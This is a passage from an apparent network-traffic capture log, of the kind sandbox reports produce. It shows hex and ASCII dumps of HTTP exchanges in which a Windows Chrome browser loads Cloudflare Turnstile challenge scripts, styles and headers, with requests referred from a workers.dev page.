l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
2025-01-15 19:05:57 UTC	1369	IN	Data Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
2025-01-15 19:05:57 UTC	1369	IN	Data Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:05:58 UTC	825	OUT	GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/ HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:05:58 UTC	1362	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:05:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 26699 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self' cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: cross-origin origin-agent-cluster: ?1 accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA referrer-policy: same-origin document-policy: js-profiling
2025-01-15 19:05:58 UTC	82	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 38 32 33 65 62 31 63 33 36 38 63 39 39 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: Server: cloudflareCF-RAY: 902823eb1c368c99-EWRalt-svc: h3=":443"; ma=86400
2025-01-15 19:05:58 UTC	1294	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:05:58 UTC	727	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902823eb1c368c99&lang=auto HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:05:58 UTC	331	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:05:58 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 119013 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 902823ef6cf77c7e-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:05:58 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 Data Ascii: ","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ff
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 2c 66 4b 2c 66 55 2c 67 35 2c 67 39 2c 67 61 2c 67 62 2c 67 65 2c 67 66 2c 67 63 2c 67 64 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 32 31 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 32 39 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 32 34 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 37 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 39 31 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 36 31 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 35 30 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 Data Ascii: ,fK,fU,g5,g9,ga,gb,ge,gf,gc,gd){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1221))/1+-parseInt(gI(1829))/2+-parseInt(gI(524))/3+-parseInt(gI(517))/4+-parseInt(gI(991))/5+-parseInt(gI(1161))/6*(-parseInt(gI(550))/7)+parseInt(gI(
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 67 4e 28 35 37 36 29 5d 5b 67 4e 28 31 38 35 37 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 67 4e 28 31 30 35 32 29 5d 28 43 2c 78 5b 67 4e 28 31 33 36 34 29 5d 29 3b 43 2b 2b 29 69 66 28 67 4e 28 36 38 39 29 21 3d 3d 67 4e 28 36 38 39 29 29 7b 66 6f 72 28 54 3d 31 2c 55 3d 30 3b 56 3c 57 3b 59 3d 6f 5b 67 4e 28 31 33 34 37 29 5d 28 5a 3c 3c 31 2e 30 37 2c 61 30 29 2c 61 31 3d 3d 6f 5b 67 4e 28 35 31 31 29 5d 28 61 32 2c 31 29 3f 28 61 33 3d 30 2c 61 34 5b 67 4e 28 34 35 39 29 5d 28 61 35 28 61 36 29 29 2c 61 37 3d 30 29 3a 61 38 2b 2b 2c 61 39 3d 30 2c 58 2b 2b 29 3b 66 6f 72 28 61 61 3d 61 62 5b 67 4e 28 38 36 32 29 5d 28 30 29 2c 61 63 3d Data Ascii: ;return G}(x),B='nAsAaAb'.split('A'),B=B[gN(576)][gN(1857)](B),C=0;o[gN(1052)](C,x[gN(1364)]);C++)if(gN(689)!==gN(689)){for(T=1,U=0;V<W;Y=o[gN(1347)](Z<<1.07,a0),a1==o[gN(511)](a2,1)?(a3=0,a4[gN(459)](a5(a6)),a7=0):a8++,a9=0,X++);for(aa=ab[gN(862)](0),ac=
2025-01-15 19:05:58 UTC	1369	IN	Data Raw: 34 2c 30 29 2c 65 4d 5b 67 4a 28 39 30 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 6d 2c 64 2c 65 2c 66 2c 67 29 7b 68 6d 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 68 6d 28 34 39 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 5e 68 7d 2c 64 5b 68 6d 28 31 37 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 64 5b 68 6d 28 31 35 32 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 5e 68 7d 2c 64 5b 68 6d 28 35 30 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 5e 68 7d 2c 64 5b 68 6d 28 35 37 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 64 5b 68 6d 28 35 39 30 29 5d 3d 66 75 6e 63 74 69 6f 6e Data Ascii: 4,0),eM[gJ(905)]=function(hm,d,e,f,g){hm=gJ,d={},d[hm(497)]=function(h,i){return i^h},d[hm(1760)]=function(h,i){return h+i},d[hm(1525)]=function(h,i){return i^h},d[hm(503)]=function(h,i){return i^h},d[hm(572)]=function(h,i){return h&i},d[hm(590)]=function
